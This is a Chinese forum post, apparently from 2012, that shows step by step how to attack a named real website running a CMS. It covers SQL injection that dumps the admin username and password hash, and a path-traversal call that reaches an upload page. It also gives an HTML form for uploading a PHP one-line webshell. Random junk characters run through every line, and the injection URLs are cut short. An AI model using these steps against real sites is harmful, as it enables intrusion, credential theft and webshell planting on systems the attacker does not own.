①注入漏洞。% Z5 r+ y/ m7 R4 z2 m! ~. J, N6 d
这站 http://www.political-security.com/
$ G7 D" G) t4 O4 O* j8 r首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
; n3 `- V/ y! v/ f5 y3 z) Cwww.political-security.com/data/mysql_error_trace.inc 爆后台 j5 A' i) p! N3 @5 p
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。& [7 K0 {$ O, y/ n- S7 C* J* w
然后写上语句 w, F; \4 r: n M3 }
查看管理员帐号! r/ ~" ~9 H" V3 z* H: W0 m$ f" M
http://www.political-security.co ... &membergroup=@`3 q* }5 P( k9 W% h# A l M& ^
+ E$ J& C8 b# `
admin ) F$ [1 ]6 L0 b7 F8 e5 j4 s0 B& e
( t9 V# e- u( o/ w7 u查看管理员密码
9 Q5 T4 A5 ^; r; Q: x. u http://www.political-security.co ... &membergroup=@`
: @) k- _ }/ N3 y% O M& `& t
$ |" R! [% ]6 x8d29b1ef9f8c5a5af429
7 q* \, G7 H$ ^1 A( h( z1 Z
0 {' E5 ]! E9 v5 z) n+ L6 k查看管理员密码
6 ?8 m9 A& k6 y
5 ~+ Y6 |- o, u$ |2 R. E6 R' a得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD50 G0 }( X& p; t; V' X
8 H! J8 K9 u9 r8 x! _8d2
. b/ ]/ D/ g5 w& E- F9b1ef9f8c5a5af421 p l! R% U1 r" s: {1 H
9
4 C) G" b7 Z I2 f' E p5 Q7 ]. k$ Z. }& [6 |
cmd5没解出来 只好测试第二个方法5 q" g$ G+ O2 o/ {+ G" j3 N
: a( F! h8 v @- j
$ N C; M- C3 Q: |- I) ~
②上传漏洞:
# L* `# q+ c9 N3 X1 h3 [8 N* K0 h$ E3 m. R# q3 |7 U6 m- P0 i5 D
只要登陆会员中心,然后访问页面链接/ W3 q/ h/ m+ ^! P' a
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”3 j' L) {. u% H' n5 Z/ J9 ^
. h; l; {+ Q( @" U如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”2 E( V9 x; I5 f( n2 P
) K0 J# Y$ |& v t n. ]( \# t4 d4 A: x
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
1 b+ M, O6 I, W7 g7 N: z8 u+ {# z4 P5 o# m- G
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
0 s9 ~$ Q) x5 o7 d: n0 g8 m. X& w或者
. a4 X" L* c6 `6 D5 d) |& q即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对